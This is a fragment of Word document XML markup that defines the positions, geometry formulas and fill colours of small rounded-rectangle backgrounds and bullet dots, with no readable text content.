                <wp:docPr id="202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635" cy="116205"/>
                          <a:chOff x="1930" y="1202"/>
                          <a:chExt cx="401" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="203" name="Freeform 205"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1201"/>
                            <a:ext cx="401" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2310 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 401"/>
                              <a:gd name="T2" fmla="+- 0 1384 1202"/>
                              <a:gd name="T3" fmla="*/ 1384 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 401"/>
                              <a:gd name="T6" fmla="+- 0 1384 1202"/>
                              <a:gd name="T7" fmla="*/ 1384 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 401"/>
                              <a:gd name="T10" fmla="+- 0 1384 1202"/>
                              <a:gd name="T11" fmla="*/ 1384 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 401"/>
                              <a:gd name="T14" fmla="+- 0 1363 1202"/>
                              <a:gd name="T15" fmla="*/ 1363 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 401"/>
                              <a:gd name="T18" fmla="+- 0 1360 1202"/>
                              <a:gd name="T19" fmla="*/ 1360 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 401"/>
                              <a:gd name="T22" fmla="+- 0 1223 1202"/>
                              <a:gd name="T23" fmla="*/ 1223 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 401"/>
                              <a:gd name="T26" fmla="+- 0 1202 1202"/>
                              <a:gd name="T27" fmla="*/ 1202 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2310 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 401"/>
                              <a:gd name="T30" fmla="+- 0 1202 1202"/>
                              <a:gd name="T31" fmla="*/ 1202 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2331 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 401"/>
                              <a:gd name="T34" fmla="+- 0 1223 1202"/>
                              <a:gd name="T35" fmla="*/ 1223 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2331 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 401"/>
                              <a:gd name="T38" fmla="+- 0 1363 1202"/>
                              <a:gd name="T39" fmla="*/ 1363 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2313 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 401"/>
                              <a:gd name="T42" fmla="+- 0 1384 1202"/>
                              <a:gd name="T43" fmla="*/ 1384 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2310 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 401"/>
                              <a:gd name="T46" fmla="+- 0 1384 1202"/>
                              <a:gd name="T47" fmla="*/ 138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01" h="183">
                                <a:moveTo>
                                  <a:pt x="38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80" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="383" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38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201"/>
                            <a:ext cx="40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\x3c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" o:spid="_x0000_s2151" style="position:absolute;margin-left:96.5pt;margin-top:60.1pt;width:20.05pt;height:9.15pt;z-index:-15494656;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1202" coordsize="40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">
                <v:shape id="Freeform 205" o:spid="_x0000_s2152" style="position:absolute;left:1930;top:1201;width:401;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="40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ubysMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEL6KplV2WahQRFC97WP/cH82z&#10;KTYvJYlt/fabhYU9DjPzG2a9HWwjOvKhdqxgMc9AEJdO11wpuF4Os08QISJrbByTghcF2G5Gb2ss&#10;tOv5m7pzrESCcChQgYmxLaQMpSGLYe5a4uTdnbcYk/SV1B77BLeNzLPsQ1qsOS0YbGlvqHycn1ZB&#10;F6/9RS6dKb+m77fbKffHduqVmoyH3QpEpCH+h//aJ60gz5bweyYdAb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7ubysMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m380,182r-359,l18,182,,161r,-3l,21,21,,380,r21,21l401,161r-18,21l380,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="380,1384;21,1384;18,1384;0,1363;0,1360;0,1223;21,1202;380,1202;401,1223;401,1363;383,1384;380,1384" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 204" o:spid="_x0000_s2153" type="#_x0000_t202" style="position:absolute;left:1930;top:1201;width:40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A2kMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5pUR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DaQxQAAANw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\x3c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2233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1033145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="201" name="Freeform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676 1627"/>
                            <a:gd name="T3" fmla="*/ 1676 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1676 1627"/>
                            <a:gd name="T7" fmla="*/ 1676 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1675 1627"/>
                            <a:gd name="T11" fmla="*/ 1675 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1655 1627"/>
                            <a:gd name="T15" fmla="*/ 1655 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1648 1627"/>
                            <a:gd name="T19" fmla="*/ 1648 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1627 1627"/>
                            <a:gd name="T23" fmla="*/ 1627 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1627 1627"/>
                            <a:gd name="T27" fmla="*/ 1627 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1651 1627"/>
                            <a:gd name="T31" fmla="*/ 1651 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1655 1627"/>
                            <a:gd name="T35" fmla="*/ 1655 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1676 1627"/>
                            <a:gd name="T39" fmla="*/ 167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36FDC" id="Freeform 202" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:81.35pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1064260;13335,1064260;11430,1063625;0,1050925;0,1046480;13335,1033145;17780,1033145;31115,1048385;31115,1050925;17780,10642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2284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986790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="254635" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="198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635" cy="116205"/>
                          <a:chOff x="1930" y="1554"/>
                          <a:chExt cx="401" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="199" name="Freeform 201"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1554"/>
                            <a:ext cx="401" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2310 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 401"/>
                              <a:gd name="T2" fmla="+- 0 1737 1554"/>
                              <a:gd name="T3" fmla="*/ 1737 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 401"/>
                              <a:gd name="T6" fmla="+- 0 1737 1554"/>
                              <a:gd name="T7" fmla="*/ 1737 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 401"/>
                              <a:gd name="T10" fmla="+- 0 1736 1554"/>
                              <a:gd name="T11" fmla="*/ 1736 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 401"/>
                              <a:gd name="T14" fmla="+- 0 1715 1554"/>
                              <a:gd name="T15" fmla="*/ 1715 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 401"/>
                              <a:gd name="T18" fmla="+- 0 1712 1554"/>
                              <a:gd name="T19" fmla="*/ 1712 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 401"/>
                              <a:gd name="T22" fmla="+- 0 1575 1554"/>
                              <a:gd name="T23" fmla="*/ 1575 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 401"/>
                              <a:gd name="T26" fmla="+- 0 1554 1554"/>
                              <a:gd name="T27" fmla="*/ 1554 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2310 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 401"/>
                              <a:gd name="T30" fmla="+- 0 1554 1554"/>
                              <a:gd name="T31" fmla="*/ 1554 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2331 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 401"/>
                              <a:gd name="T34" fmla="+- 0 1575 1554"/>
                              <a:gd name="T35" fmla="*/ 1575 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2331 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 401"/>
                              <a:gd name="T38" fmla="+- 0 1715 1554"/>
                              <a:gd name="T39" fmla="*/ 1715 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2313 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 401"/>
                              <a:gd name="T42" fmla="+- 0 1736 1554"/>
                              <a:gd name="T43" fmla="*/ 1736 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2310 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 401"/>
                              <a:gd name="T46" fmla="+- 0 1737 1554"/>
                              <a:gd name="T47" fmla="*/ 173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01" h="183">
                                <a:moveTo>
                                  <a:pt x="38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80" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="383" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38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54"/>
                            <a:ext cx="40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\x3C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9" o:spid="_x0000_s2154" style="position:absolute;margin-left:96.5pt;margin-top:77.7pt;width:20.05pt;height:9.15pt;z-index:-15493632;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1554" coordsize="40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">
                <v:shape id="Freeform 201" o:spid="_x0000_s2155" style="position:absolute;left:1930;top:1554;width:401;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="40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xY28EA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgheRNN1WdFqFBEUL3tYH/ehGZti&#10;MylJtq3/3iws7G0+vuest72tRUs+VI4VvE8zEMSF0xWXCq6Xw2QBIkRkjbVjUvCkANvN4G2NuXYd&#10;f1N7jqVIIRxyVGBibHIpQ2HIYpi6hjhxd+ctxgR9KbXHLoXbWs6ybC4tVpwaDDa0N1Q8zj9WQRuv&#10;3UV+OFN8jT9vt9PMH5uxV2o07HcrEJH6+C/+c590mr9cwu8z6QK5e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8WNvBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m380,183r-359,l18,182,,161r,-3l,21,21,,380,r21,21l401,161r-18,21l380,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="380,1737;21,1737;18,1736;0,1715;0,1712;0,1575;21,1554;380,1554;401,1575;401,1715;383,1736;380,1737" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 200" o:spid="_x0000_s2156" type="#_x0000_t202" style="position:absolute;left:1930;top:1554;width:40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swk8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/AEb2uqB3GrUURcEASx1oPHZ/Ns&#10;g81Lt4la/71ZWNjjMDPfMPNlZ2vxoNYbxwpGwwQEceG04VLBKf/+nILwAVlj7ZgUvMjDctH7mGOq&#10;3ZMzehxDKSKEfYoKqhCaVEpfVGTRD11DHL2ray2GKNtS6hafEW5rOU6SibRoOC5U2NC6ouJ2vFsF&#10;qzNnG/Ozvxyya2by/Cvh3eSm1KDfrWYgAnXhP/zX3moFkQi/Z+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swk8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\x3C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2336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1249045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="197" name="Freeform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016 1967"/>
                            <a:gd name="T3" fmla="*/ 2016 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2016 1967"/>
                            <a:gd name="T7" fmla="*/ 2016 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2015 1967"/>
                            <a:gd name="T11" fmla="*/ 2015 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1995 1967"/>
                            <a:gd name="T15" fmla="*/ 1995 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1988 1967"/>
                            <a:gd name="T19" fmla="*/ 1988 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1967 1967"/>
                            <a:gd name="T23" fmla="*/ 1967 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1967 1967"/>
                            <a:gd name="T27" fmla="*/ 1967 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1992 1967"/>
                            <a:gd name="T31" fmla="*/ 1992 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1995 1967"/>
                            <a:gd name="T35" fmla="*/ 1995 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2016 1967"/>
                            <a:gd name="T39" fmla="*/ 201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18AD1" id="Freeform 198" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:98.35pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1280160;13335,1280160;11430,1279525;0,1266825;0,1262380;13335,1249045;17780,1249045;31115,1264920;31115,1266825;17780,12801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2387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1202690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="194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16205"/>
                          <a:chOff x="1930" y="1894"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="195" name="Freeform 197"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1894"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 2077 1894"/>
                              <a:gd name="T3" fmla="*/ 2077 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 2077 1894"/>
                              <a:gd name="T7" fmla="*/ 2077 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 2076 1894"/>
                              <a:gd name="T11" fmla="*/ 2076 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 2056 1894"/>
                              <a:gd name="T15" fmla="*/ 2056 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 2052 1894"/>
                              <a:gd name="T19" fmla="*/ 2052 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 1916 1894"/>
                              <a:gd name="T23" fmla="*/ 1916 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 1894 1894"/>
                              <a:gd name="T27" fmla="*/ 1894 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 1894 1894"/>
                              <a:gd name="T31" fmla="*/ 1894 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 1916 1894"/>
                              <a:gd name="T35" fmla="*/ 1916 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 2056 1894"/>
                              <a:gd name="T39" fmla="*/ 2056 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 2076 1894"/>
                              <a:gd name="T43" fmla="*/ 2076 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 2077 1894"/>
                              <a:gd name="T47" fmla="*/ 207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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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550" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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894"/>
                            <a:ext cx="57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\u003c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5" o:spid="_x0000_s2157" style="position:absolute;margin-left:96.5pt;margin-top:94.7pt;width:28.6pt;height:9.15pt;z-index:-15492608;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1894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">
                <v:shape id="Freeform 197" o:spid="_x0000_s2158" style="position:absolute;left:1930;top:1894;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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CP7cQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS0/CQBC+k/AfNmPCDbbyUCksxBhRuCkaE29jd2ib&#10;dmfr7lrKv3dJSLjNl+85y3VnatGS86VlBbejBARxZnXJuYLPj83wAYQPyBpry6TgRB7Wq35viam2&#10;R36ndh9yEUPYp6igCKFJpfRZQQb9yDbEkTtYZzBE6HKpHR5juKnlOEnupMGSY0OBDT0VlFX7P6Og&#10;epm0v/dv383P/OvVTXVe7czmWanBTfe4ABGoC1fxxb3Vcf58Budn4gV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gj+3EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m550,183r-529,l18,182,,162r,-4l,22,21,,550,r21,22l571,162r-18,20l550,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,2077;21,2077;18,2076;0,2056;0,2052;0,1916;21,1894;550,1894;571,1916;571,2056;553,2076;550,2077" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 196" o:spid="_x0000_s2159" type="#_x0000_t202" style="position:absolute;left:1930;top:1894;width:5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H5h8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/iKD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H5h8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\u003c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2438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1473200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="193" name="Freeform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368 2320"/>
                            <a:gd name="T3" fmla="*/ 2368 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2368 2320"/>
                            <a:gd name="T7" fmla="*/ 2368 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2368 2320"/>
                            <a:gd name="T11" fmla="*/ 2368 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2347 2320"/>
                            <a:gd name="T15" fmla="*/ 2347 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2341 2320"/>
                            <a:gd name="T19" fmla="*/ 2341 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2320 2320"/>
                            <a:gd name="T23" fmla="*/ 2320 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2320 2320"/>
                            <a:gd name="T27" fmla="*/ 2320 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2344 2320"/>
                            <a:gd name="T31" fmla="*/ 2344 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2347 2320"/>
                            <a:gd name="T35" fmla="*/ 2347 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2368 2320"/>
                            <a:gd name="T39" fmla="*/ 2368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1B8EF" id="Freeform 194" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:116pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1503680;13335,1503680;11430,1503680;0,1490345;0,1486535;13335,1473200;17780,1473200;31115,1488440;31115,1490345;17780,150368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2489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1426845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="190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16205"/>
                          <a:chOff x="1930" y="2247"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="191" name="Freeform 193"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2246"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 2429 2247"/>
                              <a:gd name="T3" fmla="*/ 2429 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 2429 2247"/>
                              <a:gd name="T7" fmla="*/ 2429 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 2428 2247"/>
                              <a:gd name="T11" fmla="*/ 2428 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 2408 2247"/>
                              <a:gd name="T15" fmla="*/ 2408 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 2405 2247"/>
                              <a:gd name="T19" fmla="*/ 2405 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 2268 2247"/>
                              <a:gd name="T23" fmla="*/ 2268 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 2247 2247"/>
                              <a:gd name="T27" fmla="*/ 2247 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 2247 2247"/>
                              <a:gd name="T31" fmla="*/ 2247 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 2268 2247"/>
                              <a:gd name="T35" fmla="*/ 2268 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 2408 2247"/>
                              <a:gd name="T39" fmla="*/ 2408 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
